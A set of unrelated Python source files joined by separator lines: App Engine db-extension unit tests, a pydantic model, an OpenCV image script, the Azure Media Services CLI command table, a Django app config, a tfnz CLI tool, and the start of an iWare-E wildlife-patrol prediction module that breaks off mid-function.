entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.slug, None)
self.assertEqual(entity_2.slug, None)
def test_slug_property3(self):
entity_1 = FooModel(key_name='foo', name=u'---', name2=u'---')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'___', name2=u'___')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.slug2, 'some-default-value')
self.assertEqual(entity_2.slug2, 'some-default-value')
def test_slug_property4(self):
entity_1 = FooModel(key_name='foo', name=u'---', name2=u'Some really very big and maybe enormous string')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'___', name2=u'abcdefghijklmnopqrstuwxyz')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.slug2, 'some-really-very-big')
self.assertEqual(entity_2.slug2, 'abcdefghijklmnopqrst')
def test_etag_property(self):
entity_1 = FooModel(key_name='foo', name=u'Mary Björk')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'Tião Macalé')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.etag, hashlib.sha1(entity_1.name.encode('utf8')).hexdigest())
self.assertEqual(entity_2.etag, hashlib.sha1(entity_2.name.encode('utf8')).hexdigest())
def test_etag_property2(self):
entity_1 = FooModel(key_name='foo', name=u'Mary Björk')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'Tião Macalé')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.etag2, None)
self.assertEqual(entity_2.etag2, None)
def test_json_property(self):
entity_1 = JsonModel(key_name='foo', data={'foo': 'bar'})
entity_1.put()
entity_1 = JsonModel.get_by_key_name('foo')
self.assertEqual(entity_1.data, {'foo': 'bar'})
def test_json_property2(self):
self.assertRaises(db.BadValueError, JsonModel, key_name='foo', data='foo')
def test_timezone_property(self):
zone = 'America/Chicago'
entity_1 = TimezoneModel(key_name='foo', data=zone)
entity_1.put()
entity_1 = TimezoneModel.get_by_key_name('foo')
self.assertEqual(entity_1.data, ext_db.pytz.timezone(zone))
def test_timezone_property2(self):
self.assertRaises(db.BadValueError, TimezoneModel, key_name='foo', data=[])
def test_timezone_property3(self):
self.assertRaises(ext_db.pytz.UnknownTimeZoneError, TimezoneModel, key_name='foo', data='foo')
def test_key_property(self):
key = db.Key.from_path('Bar', 'bar-key')
entity_1 = FooModel(name='foo', key_name='foo', somekey=key)
entity_1.put()
entity_1 = FooModel.get_by_key_name('foo')
self.assertEqual(entity_1.somekey, key)
def test_key_property2(self):
key = db.Key.from_path('Bar', 'bar-key')
entity_1 = FooModel(name='foo', key_name='foo', somekey=str(key))
entity_1.put()
entity_1 = FooModel.get_by_key_name('foo')
self.assertEqual(entity_1.somekey, key)
def test_key_property3(self):
key = db.Key.from_path('Bar', 'bar-key')
entity_1 = FooModel(name='foo', key_name='foo', somekey=str(key))
entity_1.put()
entity_2 = FooModel(name='bar', key_name='bar', somekey=entity_1)
entity_2.put()
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_2.somekey, entity_1.key())
def test_key_property4(self):
key = db.Key.from_path('Bar', 'bar-key')
entity_1 = FooModel(name='foo', somekey=str(key))
self.assertRaises(db.BadValueError, FooModel, name='bar', key_name='bar', somekey=entity_1)
def test_key_property5(self):
self.assertRaises(TypeError, FooModel, name='foo', key_name='foo', somekey=['foo'])
def test_key_property6(self):
self.assertRaises(datastore_errors.BadKeyError, FooModel, name='foo', key_name='foo', somekey='foo')
#===========================================================================
# @db.retry_on_timeout
#===========================================================================
def test_retry_on_timeout_1(self):
counter = [0]
test_timeout_1(counter=counter)
self.assertEqual(counter[0], 3)
def test_retry_on_timeout_2(self):
counter = [0]
self.assertRaises(ValueError, test_timeout_2, counter=counter)
self.assertEqual(counter[0], 5)
def test_retry_on_timeout_3(self):
counter = [0]
self.assertRaises(db.Timeout, test_timeout_3, counter=counter)
self.assertEqual(counter[0], 3)
#===========================================================================
# @db.load_entity
#===========================================================================
def test_load_entity_with_key(self):
@ext_db.load_entity(FooModel, 'foo_key', 'foo', 'key')
def get(*args, **kwargs):
return kwargs['foo']
foo = FooModel(name='foo')
foo.put()
loaded_foo = get(foo_key=str(foo.key()))
self.assertEqual(str(loaded_foo.key()), str(foo.key()))
self.assertEqual(get(foo_key=None), None)
def test_load_entity_with_key_2(self):
@ext_db.load_entity(FooModel, 'foo_key', 'foo', 'key')
def get(*args, **kwargs):
return kwargs['foo']
self.assertRaises(NotFound, get, foo_key=str(db.Key.from_path('FooModel', 'bar')))
def test_load_entity_with_id(self):
@ext_db.load_entity(FooModel, 'foo_id', 'foo', 'id')
def get(*args, **kwargs):
return kwargs['foo']
foo = FooModel(name='foo')
foo.put()
loaded_foo = get(foo_id=foo.key().id())
self.assertEqual(str(loaded_foo.key()), str(foo.key()))
def test_load_entity_with_id_2(self):
@ext_db.load_entity(FooModel, 'foo_id', 'foo', 'id')
def get(*args, **kwargs):
return kwargs['foo']
self.assertRaises(NotFound, get, foo_id=-1)
def test_load_entity_with_key_name(self):
@ext_db.load_entity(FooModel, 'foo_key_name', 'foo', 'key_name')
def get(*args, **kwargs):
return kwargs['foo']
foo = FooModel(key_name='foo', name='foo')
foo.put()
loaded_foo = get(foo_key_name='foo')
self.assertEqual(str(loaded_foo.key()), str(foo.key()))
def test_load_entity_with_key_name_2(self):
@ext_db.load_entity(FooModel, 'foo_key_name', 'foo', 'key_name')
def get(*args, **kwargs):
return kwargs['foo']
self.assertRaises(NotFound, get, foo_key_name='bar')
def test_load_entity_with_key_with_guessed_fetch_mode(self):
@ext_db.load_entity(FooModel, 'foo_key')
def get(*args, **kwargs):
return kwargs['foo']
foo = FooModel(name='foo')
foo.put()
loaded_foo = get(foo_key=str(foo.key()))
self.assertEqual(str(loaded_foo.key()), str(foo.key()))
self.assertEqual(get(foo_key=None), None)
def test_load_entity_with_key_with_impossible_fetch_mode(self):
def test():
@ext_db.load_entity(FooModel, 'foo_bar')
def get(*args, **kwargs):
return kwargs['foo']
self.assertRaises(NotImplementedError, test)
#===========================================================================
# db.run_in_namespace
#===========================================================================
def test_run_in_namespace(self):
class MyModel(db.Model):
name = db.StringProperty()
def create_entity(name):
entity = MyModel(key_name=name, name=name)
entity.put()
def get_entity(name):
return MyModel.get_by_key_name(name)
entity = ext_db.run_in_namespace('ns1', get_entity, 'foo')
self.assertEqual(entity, None)
ext_db.run_in_namespace('ns1', create_entity, 'foo')
entity = ext_db.run_in_namespace('ns1', get_entity, 'foo')
self.assertNotEqual(entity, None)
entity = ext_db.run_in_namespace('ns2', get_entity, 'foo')
self.assertEqual(entity, None)
#===========================================================================
# db.to_key
#===========================================================================
def test_to_key(self):
class MyModel(db.Model):
pass
# None.
self.assertEqual(ext_db.to_key(None), None)
# Model without key.
self.assertEqual(ext_db.to_key(MyModel()), None)
# Model with key.
self.assertEqual(ext_db.to_key(MyModel(key_name='foo')), db.Key.from_path('MyModel', 'foo'))
# Key.
self.assertEqual(ext_db.to_key(db.Key.from_path('MyModel', 'foo')), db.Key.from_path('MyModel', 'foo'))
# Key as string.
self.assertEqual(ext_db.to_key(str(db.Key.from_path('MyModel', 'foo'))), db.Key.from_path('MyModel', 'foo'))
# All mixed.
keys = [None, MyModel(), MyModel(key_name='foo'), db.Key.from_path('MyModel', 'foo'), str(db.Key.from_path('MyModel', 'foo'))]
result = [None, None, db.Key.from_path('MyModel', 'foo'), db.Key.from_path('MyModel', 'foo'), db.Key.from_path('MyModel', 'foo')]
self.assertEqual(ext_db.to_key(keys), result)
self.assertRaises(datastore_errors.BadArgumentError, ext_db.to_key, {})
if __name__ == '__main__':
test_utils.main()
|
from typing import Optional
from pydantic import BaseModel
class Query(BaseModel):
shop_url: str
api_secret: str
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
cap = cv2.VideoCapture('Night Drive - 2689.mp4')
count = 0
while(cap.isOpened()):
count += 1
if count < 100:
continue
ret, frame = cap.read()
plt.imshow(cv2.cvtColor(frame,cv2.COLOR_BGR2RGB))
plt.show()
H, S, V = cv2.split(cv2.cvtColor(frame, cv2.COLOR_BGR2HSV))
eq_V = cv2.equalizeHist(V)
eq_hsv = cv2.merge([H, S, eq_V])
eq_image = cv2.cvtColor(eq_hsv,cv2.COLOR_HSV2RGB)
plt.imshow(eq_image)
plt.show()
#cv2.waitKey(0);
#cv2.destroyAllWindows()
break
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands import CliCommandType
from ._client_factory import (get_mediaservices_client, get_transforms_client,
get_assets_client, get_jobs_client, get_streaming_locators_client,
get_streaming_policies_client, get_streaming_endpoints_client,
get_locations_client, get_live_events_client, get_live_outputs_client,
get_content_key_policies_client, get_asset_filters_client,
get_account_filters_client)
from ._exception_handler import ams_exception_handler
# pylint: disable=line-too-long
def load_command_table(self, _): # pylint: disable=too-many-locals, too-many-statements
def get_sdk(operation, client_factory):
return CliCommandType(
operations_tmpl='azure.mgmt.media.operations#{}Operations.'.format(operation) + '{}',
client_factory=client_factory,
exception_handler=ams_exception_handler
)
def get_custom_sdk(custom_module, client_factory):
return CliCommandType(
operations_tmpl='azure.cli.command_modules.ams.operations.{}#'.format(custom_module) + '{}',
client_factory=client_factory,
exception_handler=ams_exception_handler
)
with self.command_group('ams account', get_sdk('Mediaservices', get_mediaservices_client)) as g:
g.custom_command('show', 'get_mediaservice',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.command('delete', 'delete')
g.generic_update_command('update',
getter_name='mediaservice_update_getter',
getter_type=get_custom_sdk('account', get_mediaservices_client),
custom_func_name='update_mediaservice',
custom_func_type=get_custom_sdk('account', get_mediaservices_client))
g.custom_command('list', 'list_mediaservices',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.custom_command('create', 'create_mediaservice',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.custom_command('check-name', 'check_name_availability',
custom_command_type=get_custom_sdk('account', get_locations_client))
with self.command_group('ams account storage', get_sdk('Mediaservices', get_mediaservices_client)) as g:
g.custom_command('add', 'add_mediaservice_secondary_storage',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.custom_command('remove', 'remove_mediaservice_secondary_storage',
custom_command_type=get_custom_sdk('account', get_mediaservices_client))
g.command('sync-storage-keys', 'sync_storage_keys')
with self.command_group('ams account sp', get_sdk('Mediaservices', get_mediaservices_client)) as g:
g.custom_command('create', 'create_assign_sp_to_mediaservice',
custom_command_type=get_custom_sdk('sp', get_mediaservices_client))
g.custom_command('reset-credentials', 'reset_sp_credentials_for_mediaservice',
custom_command_type=get_custom_sdk('sp', get_mediaservices_client))
with self.command_group('ams account mru', get_sdk('Mediaservices', get_mediaservices_client)) as g:
g.custom_command('show', 'get_mru',
custom_command_type=get_custom_sdk('mru', None))
g.custom_command('set', 'set_mru',
custom_command_type=get_custom_sdk('mru', None))
with self.command_group('ams transform', get_sdk('Transforms', get_transforms_client)) as g:
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
g.custom_command('create', 'create_transform',
custom_command_type=get_custom_sdk('transform', get_transforms_client))
g.generic_update_command('update',
setter_name='transform_update_setter',
setter_type=get_custom_sdk('transform', get_mediaservices_client),
custom_func_name='update_transform',
custom_func_type=get_custom_sdk('transform', get_mediaservices_client))
with self.command_group('ams transform output', get_sdk('Transforms', get_mediaservices_client)) as g:
g.custom_command('add', 'add_transform_output',
custom_command_type=get_custom_sdk('transform', get_transforms_client))
g.custom_command('remove', 'remove_transform_output',
custom_command_type=get_custom_sdk('transform', get_transforms_client))
with self.command_group('ams asset', get_sdk('Assets', get_assets_client)) as g:
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
g.command('list-streaming-locators', 'list_streaming_locators')
g.custom_command('get-encryption-key', 'get_encryption_key',
custom_command_type=get_custom_sdk('asset', get_assets_client))
g.generic_update_command('update',
custom_func_name='update_asset',
custom_func_type=get_custom_sdk('asset', get_mediaservices_client))
g.custom_command('get-sas-urls', 'get_sas_urls',
custom_command_type=get_custom_sdk('asset', get_assets_client))
g.custom_command('create', 'create_asset',
custom_command_type=get_custom_sdk('asset', get_assets_client))
with self.command_group('ams asset-filter', get_sdk('AssetFilters', get_asset_filters_client)) as g:
g.command('list', 'list')
g.show_command('show', 'get')
g.command('delete', 'delete')
g.custom_command('create', 'create_asset_filter',
custom_command_type=get_custom_sdk('asset_filter', get_asset_filters_client))
g.generic_update_command('update',
custom_func_name='update_asset_filter',
custom_func_type=get_custom_sdk('asset_filter', get_mediaservices_client))
with self.command_group('ams job', get_sdk('Jobs', get_jobs_client)) as g:
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
g.custom_command('cancel', 'cancel_job',
custom_command_type=get_custom_sdk('job', get_jobs_client))
g.custom_command('start', 'create_job',
custom_command_type=get_custom_sdk('job', get_jobs_client))
g.generic_update_command('update',
setter_name='update',
custom_func_name='update_job',
custom_func_type=get_custom_sdk('job', get_jobs_client))
with self.command_group('ams content-key-policy', get_sdk('ContentKeyPolicies', get_content_key_policies_client)) as g:
g.custom_command('create', 'create_content_key_policy',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
g.custom_command('show', 'show_content_key_policy',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
g.command('delete', 'delete')
g.command('list', 'list')
g.generic_update_command('update',
getter_name='get_policy_properties_with_secrets',
setter_name='update_content_key_policy_setter',
setter_type=get_custom_sdk('content_key_policy', get_content_key_policies_client),
custom_func_name='update_content_key_policy',
custom_func_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
with self.command_group('ams content-key-policy option', get_sdk('ContentKeyPolicies', get_content_key_policies_client)) as g:
g.custom_command('add', 'add_content_key_policy_option',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
g.custom_command('remove', 'remove_content_key_policy_option',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
g.custom_command('update', 'update_content_key_policy_option',
custom_command_type=get_custom_sdk('content_key_policy', get_content_key_policies_client))
with self.command_group('ams streaming-locator', get_sdk('StreamingLocators', get_streaming_locators_client)) as g:
g.custom_command('create', 'create_streaming_locator',
custom_command_type=get_custom_sdk('streaming_locator', get_streaming_locators_client))
g.command('list', 'list')
g.show_command('show', 'get')
g.command('delete', 'delete')
g.command('get-paths', 'list_paths')
g.custom_command('list-content-keys', 'list_content_keys',
custom_command_type=get_custom_sdk('streaming_locator', get_streaming_locators_client))
with self.command_group('ams streaming-policy', get_sdk('StreamingPolicies', get_streaming_policies_client)) as g:
g.custom_command('create', 'create_streaming_policy',
custom_command_type=get_custom_sdk('streaming_policy', get_streaming_policies_client))
g.command('list', 'list')
g.show_command('show', 'get')
g.command('delete', 'delete')
with self.command_group('ams streaming-endpoint', get_sdk('StreamingEndpoints', get_streaming_endpoints_client)) as g:
g.command('list', 'list')
g.custom_command('start', 'start',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
supports_no_wait=True)
g.custom_command('stop', 'stop',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
supports_no_wait=True)
g.custom_command('create', 'create_streaming_endpoint',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
supports_no_wait=True)
g.generic_update_command('update',
setter_name='update_streaming_endpoint_setter',
setter_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
custom_func_name='update_streaming_endpoint',
custom_func_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client),
supports_no_wait=True)
g.show_command('show', 'get')
g.command('delete', 'delete')
g.command('scale', 'scale')
g.wait_command('wait')
with self.command_group('ams streaming-endpoint akamai', get_sdk('StreamingEndpoints', get_streaming_endpoints_client)) as g:
g.custom_command('add', 'add_akamai_access_control',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client))
g.custom_command('remove', 'remove_akamai_access_control',
custom_command_type=get_custom_sdk('streaming_endpoint', get_streaming_endpoints_client))
with self.command_group('ams live-event', get_sdk('LiveEvents', get_live_events_client)) as g:
g.custom_command('create', 'create',
custom_command_type=get_custom_sdk('live_event', get_live_events_client),
supports_no_wait=True)
g.custom_command('start', 'start',
custom_command_type=get_custom_sdk('live_event', get_live_events_client),
supports_no_wait=True)
g.custom_command('stop', 'stop',
custom_command_type=get_custom_sdk('live_event', get_live_events_client),
supports_no_wait=True)
g.custom_command('reset', 'reset',
custom_command_type=get_custom_sdk('live_event', get_live_events_client),
supports_no_wait=True)
g.show_command('show', 'get')
g.command('delete', 'delete')
g.command('list', 'list')
g.generic_update_command('update',
setter_name='update_live_event_setter',
setter_type=get_custom_sdk('live_event', get_live_events_client),
custom_func_name='update_live_event',
custom_func_type=get_custom_sdk('live_event', get_live_events_client))
g.wait_command('wait')
with self.command_group('ams live-output', get_sdk('LiveOutputs', get_live_outputs_client)) as g:
g.custom_command('create', 'create_live_output',
custom_command_type=get_custom_sdk('live_output', get_live_outputs_client))
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
with self.command_group('ams account-filter', get_sdk('AccountFilters', get_account_filters_client)) as g:
g.custom_command('create', 'create_account_filter',
custom_command_type=get_custom_sdk('account_filter', get_account_filters_client))
g.show_command('show', 'get')
g.command('list', 'list')
g.command('delete', 'delete')
g.generic_update_command('update',
custom_func_name='update_account_filter',
custom_func_type=get_custom_sdk('account_filter', get_mediaservices_client))
with self.command_group('ams', is_preview=True):
pass
|
#!/usr/bin/env python
from django.apps import AppConfig
class DjangoMakeSuperUserConfig(AppConfig):
name = 'django_makesuperuser'
|
#!/usr/local/bin/python3.5
# Copyright (c) 2017 David Preece, All rights reserved.
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import json
from base64 import b64encode
from tfnz.cli import generic_cli, base_argparse
def main():
parser = base_argparse('tfresources')
generic_cli(parser, {None: list_resources})
def list_resources(location, args):
resources = {
'location': location.location,
'nodes': {b64encode(node.pk).decode(): node.stats for node in location.nodes.values()},
'volumes': [vol.display_name() for vol in location.volumes.values()],
'externals': [xtn.display_name() for xtn in location.externals.values()],
'endpoints': [ep.domain for ep in location.endpoints.values()]
}
print(json.dumps(resources, indent=2))
if __name__ == "__main__":
main()
|
# implementation of iWare-E for PAWS
# Lily Xu
# May 2019
import sys
import time
import pickle
import pandas as pd
import numpy as np
from scipy.optimize import minimize
from sklearn import metrics
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.preprocessing import StandardScaler
from sklearn import tree
from sklearn.svm import LinearSVC, SVC
from sklearn.gaussian_process import GaussianProcessRegressor
# from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.ensemble import BaggingClassifier, RandomForestClassifier
from imblearn.ensemble import BalancedBaggingClassifier
from sklearn.gaussian_process.kernels import RBF
from itertools import product
from gpc import GaussianProcessClassifier
NUM_COLS_TO_SKIP = 6 # number of extraneous columns in 'x' features CSV file
POSITIVE_LABEL = 1 # how a positive label is encoded in the data
RANDOM_SEED = None # could be None
N_JOBS = 1 # -1 to use max
# parameters for bagging classifier
NUM_ESTIMATORS = 32 #32 #50
MAX_SAMPLES = 0.8
MAX_FEATURES = .5
# verbose output if == 1
VERBOSE = 0
###########################################################
# modify GPR to serve as a classifier
# and offer variance results
###########################################################
def gpr_predict_proba(self, x, return_var=False):
mean_r, std = self.predict(x, return_std=True)
prob = 1 / (1 + np.exp(mean_r - 0.5))
prob = prob.reshape(-1, 1)
# form array with predictions for both classes
predictions = np.concatenate((prob, 1 - prob), axis=1)
if return_var:
var = [x**2 for x in std]
return predictions, var
else:
return predictions
# def gpr_get_var(self, x):
# _, std = self.predict(x, return_std=True)
#
# return [x**2 for x in std]
GaussianProcessRegressor.predict_proba = gpr_predict_proba
# GaussianProcessRegressor.get_var = gpr_get_var
def rf_predict_proba(self, x, return_var=False, train_x=None):
predictions = self.predict_proba_orig(x)
import forestci as fci
if return_var:
assert train_x is not None
var = fci.random_forest_error(self, train_x, x)
return predictions, var
else:
return predictions
RandomForestClassifier.predict_proba_orig = RandomForestClassifier.predict_proba
RandomForestClassifier.predict_proba = rf_predict_proba
###########################################################
# utility functions
###########################################################
# given training and testing sets, normalize data to zero mean, unit variance
def normalize_data(train, test):
scaler = StandardScaler()
# fit only on training data
scaler.fit(train)
# apply normalization to training and test data
train = scaler.transform(train)
test = scaler.transform(test)
return train, test
# by maximizing F1 score?
def determine_threshold(label, predict_test_pos_probs, num_thresholds=50):
# TODO: previously, used tpr-(1-fpr)
# fpr, tpr, thresholds = metrics.roc_curve(label, predict_test_pos_probs, pos_label=POSITIVE_LABEL)
# or maybe scaled, like 2*tpr - (1-fpr)?
thresholds = np.linspace(0, 1, num_thresholds)
f1 = np.zeros(thresholds.size)
precision = np.zeros(thresholds.size)
recall = np.zeros(thresholds.size)
auprc = np.zeros(thresholds.size)
for i in range(num_thresholds):
predict_labels = predict_test_pos_probs > thresholds[i]
predict_labels = predict_labels.astype(int)
f1[i] = metrics.f1_score(label, predict_labels)
precision[i] = metrics.precision_score(label, predict_labels, pos_label=POSITIVE_LABEL)
recall[i] = metrics.recall_score(label, predict_labels, pos_label=POSITIVE_LABEL)
precision_vals, recall_vals, _ = metrics.precision_recall_curve(label, predict_test_pos_probs, pos_label=POSITIVE_LABEL)
auprc[i] = metrics.auc(recall_vals, precision_vals)
if VERBOSE:
print('threshold: {:.4f} | f1: {:.4f}, precision: {:.4f}, recall: {:.4f}, AUPRC: {:.4f}'.format(thresholds[i], f1[i], precision[i], recall[i], auprc[i]))
# opt = np.argmax(f1)
opt = np.argmax(auprc)
print('optimal threshold {:.4f}, with f1 {:.4f}, precision {:.4f}, recall {:.4f}, AUPRC {:.4f}'.format(thresholds[opt], f1[opt], precision[opt], recall[opt], auprc[opt]))
return thresholds[opt]
# evaluate the ML model on the test set by print all relevant metrics for the test set
def evaluate_results(test_y, predict_test_pos_probs):
output = []
# compute optimal threshold and determine labels
opt_threshold = determine_threshold(test_y, predict_test_pos_probs)
predict_test = (predict_test_pos_probs > opt_threshold).astype(int)
predict_test_neg_probs = np.ones(predict_test_pos_probs.shape) - predict_test_pos_probs
predict_test_probs = np.concatenate((predict_test_neg_probs.reshape(1,-1), predict_test_pos_probs.reshape(1,-1)), axis=0).transpose()
# select the prediction column with probability of assigned label
predict_test_label_probs = predict_test_probs[[i for i in range(predict_test.shape[0])], tuple(predict_test)]
fpr, tpr, _ = metrics.roc_curve(test_y, predict_test_pos_probs, pos_label=POSITIVE_LABEL)
output.append('AUC: {:.5f}'.format(metrics.auc(fpr, tpr)))
precision_vals, recall_vals, _ = metrics.precision_recall_curve(test_y, predict_test_pos_probs, pos_label=POSITIVE_LABEL)
output.append('AUPRC: {:.5f}'.format(metrics.auc(recall_vals, precision_vals))) # area under precision-recall curve
#output.append('average precision score: {:.5f}'.format(metrics.average_precision_score(test_y, predict_test_pos_probs, pos_label=POSITIVE_LABEL)))
output.append('precision: {:.5f}'.format(metrics.precision_score(test_y, predict_test, pos_label=POSITIVE_LABEL)))
recall = metrics.recall_score(test_y, predict_test, pos_label=POSITIVE_LABEL)
output.append('recall: {:.5f}'.format(recall))
output.append('F1 score: {:.5f}'.format(metrics.f1_score(test_y, predict_test, pos_label=POSITIVE_LABEL)))
percent_positive = np.where(predict_test == POSITIVE_LABEL)[0].shape[0] / predict_test.shape[0]
l_and_l = recall ** 2 / percent_positive
max_ll = 1 / (test_y.sum() / test_y.shape[0])
output.append('L&L %: {:.5f} ({:.5f} / {:.5f})'.format(100 * (l_and_l / max_ll), l_and_l, max_ll))
output.append('cross entropy: {:.5f}'.format(metrics.log_loss(test_y, predict_test_probs)))
output.append('average prediction probability: {:.5f}'.format(predict_test_label_probs.mean()))
output.append('accuracy: {:.5f}'.format(metrics.accuracy_score(test_y, predict_test)))
output.append('cohen\'s kappa: {:.5f}'.format(metrics.cohen_kappa_score(test_y, predict_test))) # measures inter-annotator agreement
output.append('F-beta score: {:.5f}'.format(metrics.fbeta_score(test_y, predict_test, 2, pos_label=POSITIVE_LABEL))) # commonly .5, 1, or 2. if 1, then same as f1
return '\n'.join(output)
###########################################################
# setup data
###########################################################
def setup_data(x_filename, y_filename):
# read in features
features_raw = pd.read_csv(x_filename)
features_raw.drop(columns=features_raw.columns[0], inplace=True)
patrol_effort = features_raw['current_patrol_effort'].values
section_col = features_raw['section'].values
year_col = features_raw['year'].values
# features_raw.drop(columns=['temp', 'precip'], inplace=True)
# don't use current_patrol_effort as a feature
features_raw.drop(columns='current_patrol_effort', inplace=True)
# read in labels
labels_raw = pd.read_csv(y_filename)
labels_raw.drop(columns=labels_raw.columns[0], inplace=True)
features = features_raw.values[:, NUM_COLS_TO_SKIP:]
labels = labels_raw.values[:, NUM_COLS_TO_SKIP]
feature_names = list(features_raw.columns)[NUM_COLS_TO_SKIP:]
print('feature names {}'.format(feature_names))
return features_raw, features, feature_names, labels, patrol_effort, section_col, year_col
###########################################################
# iWare-E class
###########################################################
class iWare:
def __init__(self, method, num_classifiers, park, year):
self.method = method
self.num_classifiers = num_classifiers
self.park = park
self.year = year
self.patrol_thresholds = None
self.classifiers = None
self.weights = None # weights for classifiers
self.train_x_norm = None # normalized numpy array of train_x
# get classifier used as base estimator in bagging classifier
def get_base_estimator(self):
if self.method == 'gp':
# kernel = ConstantKernel(1e-20, (1e-25, 1e-15))* RBF(length_scale=1)
kernel = 1.0 * RBF(length_scale=1.0)
#kernel = 1.0 * RBF(length_scale=20.0)
# look at Matern kernel?
# ********
# Aaron suggests printing out length scale
#kernel = 1.0 * RBF(length_scale=1.0, length_scale_bounds=(1e-05, 1e5))
# optimizer=None to keep kernel parameters in place
# n_restarts_optimizer=5,
base_estimator = GaussianProcessClassifier(kernel=kernel, random_state=RANDOM_SEED, warm_start=True, max_iter_predict=100, n_jobs=-1)
# base_estimator = GaussianProcessRegressor(kernel=kernel, random_state=RANDOM_SEED, n_restarts_optimizer=0, normalize_y=True)
elif self.method == 'svm':
base_estimator = SVC(gamma='auto', random_state=RANDOM_SEED)
elif self.method == 'linear-svc':
base_estimator = LinearSVC(max_iter=5000, random_state=RANDOM_SEED)
elif self.method == 'dt':
base_estimator = tree.DecisionTreeClassifier(random_state=RANDOM_SEED)
else:
raise Exception('method \'{}\' not recognized'.format(self.method))
return base_estimator
# get overall classifier to use
def get_classifier(self, use_balanced):
if self.method == 'rf':
return RandomForestClassifier(n_estimators=NUM_ESTIMATORS,
criterion='gini', max_depth=None, min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.0,
max_features=MAX_FEATURES, max_leaf_nodes=None,
min_impurity_decrease=0.0, min_impurity_split=None,
bootstrap=True, oob_score=False, n_jobs=N_JOBS,
random_state=RANDOM_SEED, verbose=VERBOSE,
warm_start=False, class_weight=None)
# return RandomForestRegressor(n_estimators=NUM_ESTIMATORS,
# criterion='mse', max_depth=None, min_samples_split=2,
# min_samples_leaf=1, min_weight_fraction_leaf=0.0,
# max_features=MAX_FEATURES, max_leaf_nodes=None,
# min_impurity_decrease=0.0, min_impurity_split=None,
# bootstrap=True, oob_score=False,
# n_jobs=N_JOBS, random_state=RANDOM_SEED,
# verbose=VERBOSE, warm_start=False)
base_estimator = self.get_base_estimator()
# GPs don't need a bagging classifier
# return base_estimator
if self.method == 'gp':
return base_estimator
# balanced bagging classifier used for datasets with strong label imbalance
# (e.g. SWS in Cambodia)
elif use_balanced:
return BalancedBaggingClassifier(base_estimator=base_estimator,
n_estimators=NUM_ESTIMATORS, max_samples=MAX_SAMPLES,
max_features=MAX_FEATURES,
bootstrap=True, bootstrap_features=False,
oob_score=False, warm_start=False,
sampling_strategy='majority', #sampling_strategy=0.8,
replacement=True, n_jobs=N_JOBS,
random_state=RANDOM_SEED, verbose=VERBOSE)
# non-balanced bagging classifier used for other datasets
else:
return BaggingClassifier(base_estimator=base_estimator,
n_estimators=NUM_ESTIMATORS, max_samples=MAX_SAMPLES,
max_features=MAX_FEATURES,
bootstrap=True, bootstrap_features=False,
oob_score=False, warm_start=False, n_jobs=N_JOBS,
random_state=RANDOM_SEED, verbose=VERBOSE)
###########################################################
# classification
###########################################################
def get_patrol_thresholds(self, train_effort):
patrol_threshold_percentile = np.linspace(0, 100, self.num_classifiers, endpoint=False)
patrol_thresholds = np.percentile(train_effort, patrol_threshold_percentile)
print('percentiles {}'.format(patrol_threshold_percentile))
print('patrol thresholds {}'.format(patrol_thresholds))
return patrol_thresholds
def get_vote_matrix(self):
vote_power = np.identity(self.num_classifiers) # identity matrix
# vote_power = np.tril(np.ones((self.num_classifiers, self.num_classifiers))) # lower triangle
# vote_power = np.triu(np.ones((self.num_classifiers, self.num_classifiers))) # upper triangle
